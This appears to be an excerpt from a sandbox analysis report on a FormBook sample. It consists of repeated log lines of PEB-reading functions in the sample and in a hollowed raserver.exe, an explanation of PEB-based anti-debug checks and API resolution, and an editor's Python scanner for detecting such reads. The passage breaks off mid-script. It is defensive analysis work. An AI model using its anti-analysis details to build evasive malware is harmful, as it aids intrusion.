          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0B260 mov eax, dword ptr fs:[00000030h]3_2_01A0B260
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0B260 mov eax, dword ptr fs:[00000030h]3_2_01A0B260
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28A62 mov eax, dword ptr fs:[00000030h]3_2_01A28A62
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019E4257 mov eax, dword ptr fs:[00000030h]3_2_019E4257
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]3_2_01959240
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]3_2_01959240
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]3_2_01959240
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]3_2_01959240
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0199927A mov eax, dword ptr fs:[00000030h]3_2_0199927A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1EA55 mov eax, dword ptr fs:[00000030h]3_2_01A1EA55
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198FD9B mov eax, dword ptr fs:[00000030h]3_2_0198FD9B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198FD9B mov eax, dword ptr fs:[00000030h]3_2_0198FD9B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A205AC mov eax, dword ptr fs:[00000030h]3_2_01A205AC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A205AC mov eax, dword ptr fs:[00000030h]3_2_01A205AC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]3_2_01982581
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]3_2_01982581
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]3_2_01982581
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]3_2_01982581
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]3_2_01952D8A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]3_2_01952D8A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]3_2_01952D8A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]3_2_01952D8A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]3_2_01952D8A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01981DB5 mov eax, dword ptr fs:[00000030h]3_2_01981DB5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01981DB5 mov eax, dword ptr fs:[00000030h]3_2_01981DB5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01981DB5 mov eax, dword ptr fs:[00000030h]3_2_01981DB5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019835A1 mov eax, dword ptr fs:[00000030h]3_2_019835A1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]3_2_01A1FDE2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]3_2_01A1FDE2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]3_2_01A1FDE2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]3_2_01A1FDE2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A08DF1 mov eax, dword ptr fs:[00000030h]3_2_01A08DF1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]3_2_019D6DC9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]3_2_019D6DC9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]3_2_019D6DC9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov ecx, dword ptr fs:[00000030h]3_2_019D6DC9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]3_2_019D6DC9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]3_2_019D6DC9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196D5E0 mov eax, dword ptr fs:[00000030h]3_2_0196D5E0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196D5E0 mov eax, dword ptr fs:[00000030h]3_2_0196D5E0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28D34 mov eax, dword ptr fs:[00000030h]3_2_01A28D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1E539 mov eax, dword ptr fs:[00000030h]3_2_01A1E539
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984D3B mov eax, dword ptr fs:[00000030h]3_2_01984D3B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984D3B mov eax, dword ptr fs:[00000030h]3_2_01984D3B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984D3B mov eax, dword ptr fs:[00000030h]3_2_01984D3B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195AD30 mov eax, dword ptr fs:[00000030h]3_2_0195AD30
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019DA537 mov eax, dword ptr fs:[00000030h]3_2_019DA537
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01977D50 mov eax, dword ptr fs:[00000030h]3_2_01977D50
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01993D43 mov eax, dword ptr fs:[00000030h]3_2_01993D43
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D3540 mov eax, dword ptr fs:[00000030h]3_2_019D3540
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197C577 mov eax, dword ptr fs:[00000030h]3_2_0197C577
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197C577 mov eax, dword ptr fs:[00000030h]3_2_0197C577
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A03D40 mov eax, dword ptr fs:[00000030h]3_2_01A03D40
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196849B mov eax, dword ptr fs:[00000030h]3_2_0196849B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A114FB mov eax, dword ptr fs:[00000030h]3_2_01A114FB
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6CF0 mov eax, dword ptr fs:[00000030h]3_2_019D6CF0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6CF0 mov eax, dword ptr fs:[00000030h]3_2_019D6CF0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6CF0 mov eax, dword ptr fs:[00000030h]3_2_019D6CF0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28CD6 mov eax, dword ptr fs:[00000030h]3_2_01A28CD6
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]3_2_019D6C0A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]3_2_019D6C0A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]3_2_019D6C0A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]3_2_019D6C0A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]3_2_01A11C06
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2740D mov eax, dword ptr fs:[00000030h]3_2_01A2740D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2740D mov eax, dword ptr fs:[00000030h]3_2_01A2740D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2740D mov eax, dword ptr fs:[00000030h]3_2_01A2740D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198BC2C mov eax, dword ptr fs:[00000030h]3_2_0198BC2C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EC450 mov eax, dword ptr fs:[00000030h]3_2_019EC450
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EC450 mov eax, dword ptr fs:[00000030h]3_2_019EC450
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A44B mov eax, dword ptr fs:[00000030h]3_2_0198A44B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]3_2_0198AC7B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197746D mov eax, dword ptr fs:[00000030h]3_2_0197746D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01968794 mov eax, dword ptr fs:[00000030h]3_2_01968794
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7794 mov eax, dword ptr fs:[00000030h]3_2_019D7794
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7794 mov eax, dword ptr fs:[00000030h]3_2_019D7794
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7794 mov eax, dword ptr fs:[00000030h]3_2_019D7794
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019937F5 mov eax, dword ptr fs:[00000030h]3_2_019937F5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197F716 mov eax, dword ptr fs:[00000030h]3_2_0197F716
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EFF10 mov eax, dword ptr fs:[00000030h]3_2_019EFF10
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EFF10 mov eax, dword ptr fs:[00000030h]3_2_019EFF10
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A70E mov eax, dword ptr fs:[00000030h]3_2_0198A70E
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A70E mov eax, dword ptr fs:[00000030h]3_2_0198A70E
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198E730 mov eax, dword ptr fs:[00000030h]3_2_0198E730
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B73D mov eax, dword ptr fs:[00000030h]3_2_0197B73D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B73D mov eax, dword ptr fs:[00000030h]3_2_0197B73D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2070D mov eax, dword ptr fs:[00000030h]3_2_01A2070D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2070D mov eax, dword ptr fs:[00000030h]3_2_01A2070D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01954F2E mov eax, dword ptr fs:[00000030h]3_2_01954F2E
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01954F2E mov eax, dword ptr fs:[00000030h]3_2_01954F2E
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28F6A mov eax, dword ptr fs:[00000030h]3_2_01A28F6A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196EF40 mov eax, dword ptr fs:[00000030h]3_2_0196EF40
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196FF60 mov eax, dword ptr fs:[00000030h]3_2_0196FF60
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A20EA5 mov eax, dword ptr fs:[00000030h]3_2_01A20EA5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A20EA5 mov eax, dword ptr fs:[00000030h]3_2_01A20EA5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A20EA5 mov eax, dword ptr fs:[00000030h]3_2_01A20EA5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EFE87 mov eax, dword ptr fs:[00000030h]3_2_019EFE87
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D46A7 mov eax, dword ptr fs:[00000030h]3_2_019D46A7
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019836CC mov eax, dword ptr fs:[00000030h]3_2_019836CC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01998EC7 mov eax, dword ptr fs:[00000030h]3_2_01998EC7
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0FEC0 mov eax, dword ptr fs:[00000030h]3_2_01A0FEC0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28ED6 mov eax, dword ptr fs:[00000030h]3_2_01A28ED6
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019676E2 mov eax, dword ptr fs:[00000030h]3_2_019676E2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019816E0 mov ecx, dword ptr fs:[00000030h]3_2_019816E0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A61C mov eax, dword ptr fs:[00000030h]3_2_0198A61C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A61C mov eax, dword ptr fs:[00000030h]3_2_0198A61C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195C600 mov eax, dword ptr fs:[00000030h]3_2_0195C600
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195C600 mov eax, dword ptr fs:[00000030h]3_2_0195C600
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195C600 mov eax, dword ptr fs:[00000030h]3_2_0195C600
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01988E00 mov eax, dword ptr fs:[00000030h]3_2_01988E00
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0FE3F mov eax, dword ptr fs:[00000030h]3_2_01A0FE3F
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11608 mov eax, dword ptr fs:[00000030h]3_2_01A11608
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195E620 mov eax, dword ptr fs:[00000030h]3_2_0195E620
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]3_2_01967E41
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]3_2_01967E41
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]3_2_01967E41
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]3_2_01967E41
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]3_2_01967E41
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]3_2_01967E41
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]3_2_0197AE73
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Code functions reading the PEB via mov eax, dword ptr fs:[00000030h] (number of read sites per function in brackets): 3_2_0197AE73 (4), 3_2_01A1AE44 (2), 3_2_0196766D (1)
Source: C:\Windows\SysWOW64\raserver.exe | Code functions reading the PEB via mov eax, dword ptr fs:[00000030h] (mov ecx where noted; number of read sites per function in brackets): 12_2_04B1849B (1), 12_2_04BC4496 (13), 12_2_04BC14FB (1), 12_2_04B86CF0 (3), 12_2_04BD8CD6 (1), 12_2_04B3BC2C (1), 12_2_04BD740D (3), 12_2_04B86C0A (4), 12_2_04BC1C06 (14), 12_2_04B3AC7B (11), 12_2_04B2746D (1), 12_2_04B9C450 (2), 12_2_04B3A44B (1), 12_2_04B31DB5 (3), 12_2_04BD05AC (2), 12_2_04B335A1 (1), 12_2_04B3FD9B (2), 12_2_04B32581 (4), 12_2_04B02D8A (5), 12_2_04BC2D82 (7), 12_2_04BB8DF1 (1), 12_2_04B1D5E0 (2), 12_2_04BCFDE2 (4), 12_2_04B86DC9 (6, one of them mov ecx), 12_2_04B0AD30 (1), 12_2_04B13D34 (13), 12_2_04BCE539 (1), 12_2_04B34D3B (3), 12_2_04BD8D34 (1), 12_2_04B8A537 (1), 12_2_04B2C577 (2), 12_2_04B27D50 (1), 12_2_04B43D43 (1), 12_2_04B83540 (1), 12_2_04BB3D40 (1), 12_2_04BD0EA5 (3), 12_2_04B846A7 (1), 12_2_04B9FE87 (1), 12_2_04B316E0 (1, mov ecx), 12_2_04B176E2 (1), 12_2_04BD8ED6 (1), 12_2_04B48EC7 (1), 12_2_04BBFEC0 (1), 12_2_04B336CC (1), 12_2_04BBFE3F (1), 12_2_04B0E620 (1), 12_2_04B3A61C (2), 12_2_04B0C600 (3), 12_2_04B38E00 (1), 12_2_04BC1608 (1), 12_2_04B2AE73 (5), 12_2_04B1766D (1), 12_2_04B17E41 (6), 12_2_04BCAE44 (2), 12_2_04B18794 (1), 12_2_04B87794 (3), 12_2_04B437F5 (1), 12_2_04B3E730 (1), 12_2_04B2B73D (2), 12_2_04B04F2E (2), 12_2_04B2F716 (1), 12_2_04B9FF10 (1)
Note: on 32-bit Windows, fs points at the TEB and TEB+0x30 holds the PEB pointer, so mov eax, fs:[30h] is the first step of every PEB-based check (BeingDebugged at PEB+0x02, NtGlobalFlag at PEB+0x68) and of import-free API resolution by walking PEB->Ldr (PEB+0x0C). Compiler runtime code reads the PEB too, so the raw count is weak evidence by itself; what matters here is where the reads sit. The function identifiers are <process>_<round>_<address>, and three of the process-3 functions reappear in raserver.exe (process 12) at a constant offset of 0x031B0000 (0197AE73/04B2AE73, 01A1AE44/04BCAE44, 0196766D/04B1766D), which is consistent with the same unpacked FormBook module running in the hollowed XhU4EXUp0x.exe and again, relocated, inside raserver.exe.
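As an added example (editor's code, not part of the Joe Sandbox report), the scanner below finds the 32-bit encodings of mov r32, dword ptr fs:[30h] in a byte buffer, names the PEB field the following instruction touches, and checks whether two lists of function addresses are the same code at a different base. The code bytes are constructed for the example; the two address lists are the three matching function pairs from the listing above. It is a byte scan, not a disassembly, so hits are candidates to confirm in a disassembler.

```python
"""Find PEB reads (mov r32, fs:[30h]) in x86 code and match relocated functions.
Editor's example; sample bytes are constructed, address lists come from the report."""
from typing import Dict, List, Optional, Tuple

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Encodings of "mov r32, dword ptr fs:[00000030h]":
#   64 A1 30 00 00 00      mov eax, fs:[30h]   (moffs32 short form, eax only)
#   64 8B /r 30 00 00 00   mov r32, fs:[30h]   with ModRM = 0x05 | (reg << 3)
PEB_READ_PATTERNS: List[Tuple[bytes, int]] = [(b"\x64\xa1\x30\x00\x00\x00", 0)]
for reg_idx in range(8):
    PEB_READ_PATTERNS.append(
        (b"\x64\x8b" + bytes([0x05 | (reg_idx << 3)]) + b"\x30\x00\x00\x00", reg_idx))

# x86 PEB fields that malware typically reads right after fetching the PEB pointer.
PEB_FIELDS: Dict[int, str] = {0x02: "BeingDebugged", 0x0C: "Ldr",
                              0x10: "ProcessParameters", 0x68: "NtGlobalFlag"}


def peb_field_after(blob: bytes, off: int, reg_idx: int) -> Optional[str]:
    """If the instruction at `off` is a disp8 load through the register holding the
    PEB pointer (mov r32,[reg+d8] / mov r8,[reg+d8] / movzx r32,byte [reg+d8]),
    return the PEB field name, or PEB+0xNN for an unlisted offset."""
    if reg_idx == 4:            # rm=100 means a SIB byte follows; not handled here
        return None
    for opcode in (b"\x8b", b"\x8a", b"\x0f\xb6"):
        if blob.startswith(opcode, off) and off + len(opcode) + 1 < len(blob):
            modrm = blob[off + len(opcode)]
            if modrm & 0xC7 == 0x40 | reg_idx:          # mod=01 (disp8), rm=reg
                disp = blob[off + len(opcode) + 1]
                return PEB_FIELDS.get(disp, f"PEB+0x{disp:02X}")
    return None


def scan_peb_reads(blob: bytes) -> List[Tuple[int, str, Optional[str]]]:
    """Return (offset, register, PEB field touched next or None) per fs:[30h] read."""
    hits = []
    for pattern, reg_idx in PEB_READ_PATTERNS:
        start = 0
        while (pos := blob.find(pattern, start)) != -1:
            hits.append((pos, REGS[reg_idx],
                         peb_field_after(blob, pos + len(pattern), reg_idx)))
            start = pos + 1
    return sorted(hits)


def shared_rebase_delta(addrs_a: List[int], addrs_b: List[int]) -> Optional[int]:
    """Return the constant d such that a + d is in addrs_b for every a in addrs_a
    (same functions mapped at a different base), or None if no such d exists."""
    if not addrs_a:
        return None
    b = set(addrs_b)
    for cand in sorted(x - addrs_a[0] for x in addrs_b):
        if all(a + cand in b for a in addrs_a):
            return cand
    return None


# Constructed x86 snippet: three PEB reads, each followed by a field access.
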